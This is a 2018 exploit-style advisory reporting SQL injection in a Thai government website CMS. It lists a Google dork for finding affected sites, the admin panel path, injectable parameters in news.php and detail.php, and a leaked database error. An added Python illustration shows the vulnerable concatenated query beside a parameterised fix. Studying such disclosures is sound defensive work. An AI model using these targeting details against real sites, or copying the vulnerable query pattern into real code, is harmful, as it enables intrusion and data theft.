
Powered By PAS World Communitcation Ltd and Nakhonkorat ThailandGov SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : Powered By PAS World Communitcation Ltd and Nakhonkorat ThailandGov SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : nakhonkorat.com
# Google Dork : intext:''Powered By :: PAS World Communitcation,.ltd. AND nakhonkorat.com''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090089

#################################################################################################

# Admin Control Panel Path => /admin/index.php

# Exploit :

/news.php?cat_id=[SQL Injection]

/detail.php?id=[SQL Injection]
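As an added, defender-side illustration (not part of the advisory): the query shape implied by the MariaDB error quoted below, a quoted request parameter followed by `ORDER BY d_date DESC, created`, reproduced in Python on an in-memory SQLite table, with the string-concatenated form beside its parameterised replacement. Table layout, the column names other than `d_date` and `created`, and the sample rows are constructed assumptions; SQLite is used because, like MariaDB, it treats `''` inside a string literal as an escaped quote, so the `%27` probe produces the same kind of syntax error.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the news table behind news.php; only d_date and
    # created are named in the advisory's error message, the rest is assumed.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, cat_id INTEGER, title TEXT, "
                "d_date TEXT, created TEXT)")
    con.executemany("INSERT INTO news VALUES (?,?,?,?,?)", [
        (1, 1, "first",  "2018-10-01", "2018-10-01"),
        (2, 1, "second", "2018-10-02", "2018-10-02"),
        (3, 2, "other",  "2018-10-03", "2018-10-03"),
    ])
    return con

def news_vulnerable(con, cat_id):
    # Mirrors the defect behind CWE-89: the cat_id request parameter is pasted
    # into the SQL text inside quotes, so a stray quote becomes SQL syntax.
    sql = ("SELECT title FROM news WHERE cat_id = '" + cat_id +
           "' ORDER BY d_date DESC, created DESC")
    return [row[0] for row in con.execute(sql)]

def news_fixed(con, cat_id):
    # Parameterised form: cat_id is bound as data and never parsed as SQL,
    # so the same probe value simply matches no row.
    sql = "SELECT title FROM news WHERE cat_id = ? ORDER BY d_date DESC, created DESC"
    return [row[0] for row in con.execute(sql, (cat_id,))]

def probe(con, cat_id):
    """Run both forms on one input; 'error' stands for the DB syntax error
    that the vulnerable site leaks to the user."""
    try:
        vulnerable = news_vulnerable(con, cat_id)
    except sqlite3.OperationalError:
        vulnerable = "error"
    return vulnerable, news_fixed(con, cat_id)

if __name__ == "__main__":
    db = make_db()
    print(probe(db, "1"))    # both forms return ['second', 'first']
    print(probe(db, "1'"))   # ('error', []): only the concatenated form breaks
```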

#################################################################################################

# Example Vulnerable Sites =>


# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' ORDER BY d_date DESC, created' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
